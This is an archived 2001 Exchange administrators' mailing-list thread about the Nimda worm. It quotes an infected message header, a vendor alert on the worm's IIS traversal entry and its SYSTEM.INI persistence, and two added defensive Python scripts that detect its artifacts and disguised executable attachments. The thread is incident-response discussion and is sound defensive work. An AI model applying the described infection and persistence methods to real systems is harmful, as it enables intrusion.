From:   Ewins, James [mailto:[EMAIL PROTECTED]] 
Sent:   Tuesday, September 18, 2001 5:18 PM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

I also received one from you, or the address.  Open relay time?
JDE

 -Original Message-
From:   Ryan Malayter [mailto:[EMAIL PROTECTED]] 
Sent:   Tuesday, September 18, 2001 5:18 PM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

AFAIK, this infected message didn't come from me. It has my return address,
but as you can see, the sending server is mail.stadacona.ca. 

We block all executables at the server, and I started getting bounce
messages about an hour before I was even in the office.

Also, nobody I've ever actually emailed directly has bounced me a message,
and I'm not seeing any outbound port 25 traffic from any machine other than
my mail server. 

Can anyone confirm that this virus forges return addresses? The antiviral
vendors appear to be behind on this one...

-ryan-

-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 10:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters. Using Outlook 2000 I
highlighted it and it kicked off the attachment, which opened Media Player
and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?



RE: New Virus / Worm ??

2001-09-18 Thread Ryan Malayter

My mail server is not an open relay... and it appears stadacona.ca isn't,
either. Maybe the worm itself handles the SMTP conversation?

-Original Message-
From: Ewins, James [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 11:18 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


I also received one from you, or the address.  Open relay time? JDE

 -Original Message-
From:   Ryan Malayter [mailto:[EMAIL PROTECTED]] 
Sent:   Tuesday, September 18, 2001 5:18 PM
To: Exchange Discussions
Subject:RE: New Virus / Worm ??

AFAIK, this infected message didn't come from me. It has my return address,
but as you can see, the sending server is mail.stadacona.ca. 

We block all executables at the server, and I started getting bounce
messages about an hour before I was even in the office.

Also, nobody I've ever actually emailed directly has bounced me a message,
and I'm not seeing any outbound port 25 traffic from any machine other than
my mail server. 

Can anyone confirm that this virus forges return addresses? The antiviral
vendors appear to be behind on this one...

-ryan-

-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 10:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters. Using Outlook 2000 I
highlighted it and it kicked off the attachment, which opened Media Player
and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To: 
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that there
are none so blind as those who will not see --The Moody Blues (I know
you're out there)





RE: New Virus / Worm ??

2001-09-18 Thread John Bricher

On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]
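
Posts in this thread name three host-side artifacts: readme.eml files, an mmc.exe running from c:\winnt, and (in the Sybari alert) a hidden LOAD.EXE in the system directory that is started from SYSTEM.INI. As an added example, not any poster's or vendor's tool, this Python sweep checks an offline copy of a drive for all three; the winnt/system32 layout, the function names and the sample tree are assumptions constructed for illustration.

```python
"""Added example: sweep an offline copy of a drive for artifacts named in this thread."""
import os
import tempfile


def _ini_refs(path, needle="load.exe"):
    """Return (line_number, text) for non-comment lines that mention `needle`."""
    hits = []
    with open(path, "r", encoding="latin-1") as handle:
        for number, line in enumerate(handle, start=1):
            text = line.strip()
            if text and not text.startswith(";") and needle in text.lower():
                hits.append((number, text))
    return hits


def triage_tree(root, windows_dir="winnt", system_subdir="system32"):
    """Walk `root` and return findings; every path is relative to `root`.

    Assumes an NT-style layout: system.ini in the Windows directory and the
    system directory beneath it. Names are compared case-insensitively.
    """
    report = {"readme_eml": [], "mmc_in_windows_dir": None,
              "load_exe": None, "system_ini_refs": []}
    win_rel = windows_dir.lower()
    sys_rel = os.path.join(windows_dir, system_subdir).lower()
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        for name in files:
            rel = os.path.normpath(os.path.join(rel_dir, name))
            lower = name.lower()
            if lower == "readme.eml":
                report["readme_eml"].append(rel)
            elif lower == "mmc.exe" and rel_dir.lower() == win_rel:
                # mmc.exe is expected under system32, not in the Windows directory.
                report["mmc_in_windows_dir"] = rel
            elif lower == "load.exe" and rel_dir.lower() == sys_rel:
                report["load_exe"] = rel
            elif lower == "system.ini" and rel_dir.lower() == win_rel:
                report["system_ini_refs"] = _ini_refs(os.path.join(dirpath, name))
    report["readme_eml"].sort()
    return report


def still_persistent(report):
    """True when deleting the .eml files alone would leave a start-up hook behind."""
    return bool(report["load_exe"] or report["system_ini_refs"]
                or report["mmc_in_windows_dir"])


def build_constructed_tree(base):
    """Create a small constructed tree that mimics the reports in the thread."""
    layout = {
        "WINNT/mmc.exe": "",
        "WINNT/system32/mmc.exe": "",
        "WINNT/system32/LOAD.EXE": "",
        # Constructed system.ini content, not copied from an infected host.
        "WINNT/system.ini": "[boot]\n; constructed line\nshell=explorer.exe load.exe\n",
        "Inetpub/wwwroot/readme.eml": "",
        "shares/docs/README.EML": "",
        "shares/docs/notes.txt": "",
    }
    for rel, content in layout.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as handle:
            handle.write(content)
    return base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        result = triage_tree(build_constructed_tree(tmp))
        for key, value in result.items():
            print(f"{key}: {value}")
        print("start-up hook still present:", still_persistent(result))
```

A hit on `system_ini_refs` or `load_exe` means that removing the .eml files alone leaves the start-up entry in place.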






RE: New Virus / Worm ??

2001-09-18 Thread Tom Buoniello

We just sent the following to all our customers.
Tom Buoniello
Sybari Software, Inc.
[EMAIL PROTECTED]

Virus Alert: W32/Nimda.A@mm
Is this a Virus that uses E-mail?: yes

Virus Name:
---
W32/Nimda.A@mm

Alias:
---
W32/Nimda-A
W32/Nimda-mm


E-mail Subject:
---
None


E-mail Body:
---
None

E-mail Attachments:
---
README.EXE

Description:
---
This worm will enter a computer in one out of possibly two ways - it will
either be received as an email with an attachment, and it seems that it will
also attempt to break into machines running the web server software IIS
(Internet Information Server), through a security hole known as a directory
traversal exploit. 
When the file is run, it will copy itself to the system directory as a
hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so
that it is run from startup.


At the Present time a Filter Rule for : Readme.exe (all types) will remove
this from your email server

We will be releasing AV Engine Updates when they are made available.

Thank You,

Sybari Software, Inc.


More Info:
---
http://www.sybari.com/alerts


List Maintenance:
--- http://www.sybari.com/support/support_list.asp

-Original Message-
From: Monteleone-Haught Matt - Millville [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 12:28 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


I got the same message.  Scanmail ripped off the attachment, because I block
all EXE files.  

Matthew
Exchange Disaster Recovery, Live it, Learn It, Love It, Get yours today!
http://www.microsoft.com/TechNet/exchange/technote/edrv3p1.asp

Besides the technical limitations on the PST (remember the P stands for
Personal, that means you're responsible not the mail admin)... Jim Schwartz
8-16-01


-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters.
Using Outlook 2000 I highlighted it and it kicked off the attachment, which
opened Media Player and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
 id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To:
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
 type=multipart/alternative;
 boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
 boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
 charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
 name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that there
are none so blind as those who will not see
--The Moody Blues (I know you're out there)
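
The header quoted in this thread declares the attachment as audio/x-wav while naming it readme.exe, and several replies describe blocking by file name or extension. The following Python check is an added example, not code from any poster or vendor here; it flags that mismatch and also a renamed executable, and the extension list, reason labels and sample messages are constructed assumptions.

```python
"""Added example: flag attachments whose name, declared type and bytes disagree."""
import base64
import email
import os
from email import policy

# Extensions blocked outright (example list; the thread's rule is "block all EXE").
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs"}
# Media types that have no business carrying an executable file name.
PASSIVE_MAIN_TYPES = {"audio", "video", "image", "text"}


def inspect_attachments(raw_message: bytes):
    """Return [(filename, declared_type, [reasons])] for every suspicious leaf part."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        declared = part.get_content_type()
        # get_filename() reads Content-Disposition "filename" and falls back to the
        # Content-Type "name" parameter, which is where the quoted header puts it.
        filename = part.get_filename() or ""
        ext = os.path.splitext(filename)[1].lower()
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if ext in EXECUTABLE_EXTS:
            reasons.append("executable-extension")
            if part.get_content_maintype() in PASSIVE_MAIN_TYPES:
                reasons.append("type-name-mismatch")
        # DOS/PE executables start with "MZ"; this catches a renamed attachment.
        # Unnamed text bodies are skipped so a message starting "MZ" is not flagged.
        if payload[:2] == b"MZ" and (filename or part.get_content_maintype() != "text"):
            reasons.append("mz-magic")
        if reasons:
            findings.append((filename, declared, reasons))
    return findings


def should_block(raw_message: bytes) -> bool:
    """Gateway decision: quarantine if any part produced a finding."""
    return bool(inspect_attachments(raw_message))


def build_sample(content_type: str, name: str, payload: bytes) -> bytes:
    """Constructed message with the same MIME layout as the header quoted in the thread."""
    body = base64.b64encode(payload).decode("ascii")
    return (
        "From: sender@example.invalid\n"
        "To: recipient@example.invalid\n"
        "Subject: constructed sample\n"
        "MIME-Version: 1.0\n"
        "Content-Type: multipart/related;\n"
        ' type="multipart/alternative";\n'
        ' boundary="_ABC1234567890DEF_"\n'
        "\n"
        "--_ABC1234567890DEF_\n"
        "Content-Type: multipart/alternative;\n"
        ' boundary="_ABC0987654321DEF_"\n'
        "\n"
        "--_ABC0987654321DEF_\n"
        'Content-Type: text/html; charset="iso-8859-1"\n'
        "Content-Transfer-Encoding: quoted-printable\n"
        "\n"
        "<html><body>constructed body</body></html>\n"
        "--_ABC0987654321DEF_--\n"
        "\n"
        "--_ABC1234567890DEF_\n"
        f"Content-Type: {content_type};\n"
        f' name="{name}"\n'
        "Content-Transfer-Encoding: base64\n"
        "Content-ID: <EA4DMGBP9p>\n"
        "\n"
        f"{body}\n"
        "--_ABC1234567890DEF_--\n"
    ).encode("ascii")


# Constructed payloads: a 12-byte stub carrying only the MZ signature (not a
# runnable program) and the first bytes of a RIFF/WAVE header.
MZ_STUB = b"MZ" + b"\x00" * 10
WAV_STUB = b"RIFF\x24\x00\x00\x00WAVE"

if __name__ == "__main__":
    for ctype, name, data in [
        ("audio/x-wav", "readme.exe", MZ_STUB),
        ("audio/x-wav", "chime.wav", WAV_STUB),
        ("audio/x-wav", "song.wav", MZ_STUB),
    ]:
        print(name, inspect_attachments(build_sample(ctype, name, data)))
```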





RE: New Virus / Worm ??

2001-09-18 Thread William Smith

It's a new/variant worm, possibly related to this:

http://www.zdnet.com/eweek/stories/general/0,11011,2810273,00.html

W

-Original Message-
From: Andrew Chan [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:41 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


It's time to activate those Content Filter features, AGAIN... 

:-)

Andrew,
MCSE (NT  W2K) + CCNA
 

-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 8:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and
the subject line was a lot of nonsense characters. Using Outlook 2000 I
highlighted it and it kicked off the attachment, which opened Media
Player and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To: 
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that
there are none so blind as those who will not see --The Moody Blues
(I know you're out there)





RE: New Virus / Worm ?? NAI's extra.dat

2001-09-18 Thread Heather Bellson

http://vil.mcafee.com/dispVirus.asp?virus_k=99209;



-Original Message-
From: Tom Buoniello [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


We just sent the following to all our customers.
Tom Buoniello
Sybari Software, Inc.
[EMAIL PROTECTED]

Virus Alert: W32/Nimda.A@mm
Is this a Virus that uses E-mail?: yes

Virus Name:
---
W32/Nimda.A@mm

Alias:
---
W32/Nimda-A
W32/Nimda-mm


E-mail Subject:
---
None


E-mail Body:
---
None

E-mail Attachments:
---
README.EXE

Description:
---
This worm will enter a computer in one out of possibly two ways - it will
either be received as an email with an attachment, and it seems that it will
also attempt to break into machines running the web server software IIS
(Internet Information Server), through a security hole known as a directory
traversal exploit. 
When the file is run, it will copy itself to the system directory as a
hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so
that it is run from startup.


At the Present time a Filter Rule for : Readme.exe (all types) will remove
this from your email server

We will be releasing AV Engine Updates when they are made available.

Thank You,

Sybari Software, Inc.


More Info:
---
http://www.sybari.com/alerts


List Maintenance:
--- http://www.sybari.com/support/support_list.asp

-Original Message-
From: Monteleone-Haught Matt - Millville [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 12:28 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


I got the same message.  Scanmail ripped off the attachment, because I block
all EXE files.  

Matthew
Exchange Disaster Recovery, Live it, Learn It, Love It, Get yours today!
http://www.microsoft.com/TechNet/exchange/technote/edrv3p1.asp

Besides the technical limitations on the PST (remember the P stands for
Personal, that means you're responsible not the mail admin)... Jim Schwartz
8-16-01


-Original Message-
From: John Matteson [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??


I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters.
Using Outlook 2000 I highlighted it and it kicked off the attachment, which
opened Media Player and tried to play a file, but got a content error.

Here is the header from the message as it was received.  Anyone have any
ideas about this?

===
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
 id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To:
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
 type=multipart/alternative;
 boundary=_ABC1234567890DEF_
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--_ABC1234567890DEF_
Content-Type: multipart/alternative;
 boundary=_ABC0987654321DEF_

--_ABC0987654321DEF_
Content-Type: text/html;
 charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--_ABC0987654321DEF_--

--_ABC1234567890DEF_
Content-Type: audio/x-wav;
 name=readme.exe
Content-Transfer-Encoding: base64
Content-ID: EA4DMGBP9p

John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981

...the words that I remember from my childhood still are true, that there
are none so blind as those who will not see
--The Moody Blues (I know you're out there)



RE: New Virus / Worm ??

2001-09-18 Thread Joel Musheno

http://www.mcaffee.com/   right on the frontpage... here's a little more
as well...

http://www.wired.com/news/technology/0%2C1282%2C46944%2C00.html

http:[EMAIL PROTECTED]
tml



-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]






RE: New Virus / Worm ??

2001-09-18 Thread Pfefferkorn, Pete (PFEFFEPE)

Yes, NAI released an extra.dat.  Still waiting for Trend to put out an
update.

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]






RE: New Virus / Worm ??

2001-09-18 Thread Daniel Deward

If you block EXE's there is no need to wait for updates.  For more
information, visit http://www.cmsconnect.com

Dan


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 3:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

Yes, NAI released an extra.dat.  Still waiting for Trend to put out an
update.

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]






RE: New Virus / Worm ??

2001-09-18 Thread msharik

has anybody seen anything Official about the .eml files?  I've just heard
anecdotal evidence about them.  

-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Why do they put pictures of criminals up in the Post Office?  What are we
supposed to do . . . write to these men? Why don't they just put their
pictures on the postage stamps so the mailmen could look for them while they
delivered the mail? 
-


-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you block EXE's there is no need to wait for updates.  For more
information, visit http://www.cmsconnect.com

Dan


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 3:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]






RE: New Virus / Worm ??

2001-09-18 Thread Erik Sojka

I heard something official from this guy I know...

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
 Sent: Tuesday, September 18, 2001 3:37 PM
 To: Exchange Discussions
 Subject: RE: New Virus / Worm ??
 
 
 has anybody seen anything Official about the .eml files?  
 I've just heard
 anecdotal evidence about them.  
 
 -Michèle
 Immigration site:  http://LadySun1969.tripod.com
 Our new 2001 Miata:  http://members.cardomain.com/bpituley
 Tiggercam:  http://www.tiggercam.co.uk
 -
 Why do they put pictures of criminals up in the Post Office?  
 What are we
 supposed to do . . . write to these men? Why don't they just put their
 pictures on the postage stamps so the mailmen could look for 
 them while they
 delivered the mail? 
 -
 




RE: New Virus / Worm ??

2001-09-18 Thread Durkee, Peter

They are mentioned in the NAI website. I've also seen mention of WAV and COM files.

-Peter


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:37
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


has anybody seen anything Official about the .eml files?  I've just heard
anecdotal evidence about them.  

-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Why do they put pictures of criminals up in the Post Office?  What are we
supposed to do . . . write to these men? Why don't they just put their
pictures on the postage stamps so the mailmen could look for them while they
delivered the mail? 
-


-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you block EXE's there is no need to wait for updates.  For more
information, visit http://www.cmsconnect.com

Dan


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 3:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]




__
This message is private or privileged.  If you are not the
person for whom this message is intended, please delete it
and notify me immediately, and please do not copy or send
this message to anyone else. 






RE: New Virus / Worm ??

2001-09-18 Thread John Allhiser

I believe readme.eml is loaded to an infected IIS website as an attachment to
every page in the site.
When the infected site is accessed, it is downloaded as an .exe  
 
This is what I see on securityfocus.com and the noted anti-virus sites.

John Allhiser MCSE CCNA
Network Engineer
Business Men's Assurance

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


has anybody seen anything Official about the .eml files?  I've just heard
anecdotal evidence about them.  

-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Why do they put pictures of criminals up in the Post Office?  What are we
supposed to do . . . write to these men? Why don't they just put their
pictures on the postage stamps so the mailmen could look for them while they
delivered the mail? 
-


-Original Message-
From: Daniel Deward [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 3:37 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


If you block EXE's there is no need to wait for updates.  For more
information, visit http://www.cmsconnect.com

Dan


-Original Message-
From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 3:16 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??

Yes, NAI released an extra.dat  Still waiting for trend to put out an
update.  

Pete Pfefferkorn
Senior Systems Engineer/Mail Administrator
University of Cincinnati
51 Goodman Street
Cincinnati, OH  45221
Phone - (513) 556-9076
Fax - (513) 556-2042


-Original Message-
From: Etts, Russell [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:51 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


Does anyone have any more info on this??

Does NAI have an update?  I can't get through to them.

Thanks

Russell

-Original Message-
From: John Bricher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:33 PM
To: Exchange Discussions
Subject: RE: New Virus / Worm ??


On the servers that were infected at our company, we found a mmc.exe that
was running in c:\winnt.  This appeared to be regenerating the readme.eml
files.  We killed the process, deleted the file, and deleted the .eml files.
This appears to have worked for now.

Not sure how to stop it from happening again.


John Bricher
Windows NT Engineer
Cybear, Inc.
561-999-3549
[EMAIL PROTECTED]






RE: New Virus / Worm ??

2001-09-18 Thread msharik

you got a link for where they're mentioned?  I looked at nai.com and at
sybari.com & sophos.com and can't find anything about them.

maybe i'm just blind.


-Michèle
Immigration site:  http://LadySun1969.tripod.com
Our new 2001 Miata:  http://members.cardomain.com/bpituley
Tiggercam:  http://www.tiggercam.co.uk
-
Pinky, are you pondering what I'm pondering? Well, I think so Brain, but
what if we stick to the seat covers? 
-


-Original Message-
From: Durkee, Peter [mailto:[EMAIL PROTECTED]]
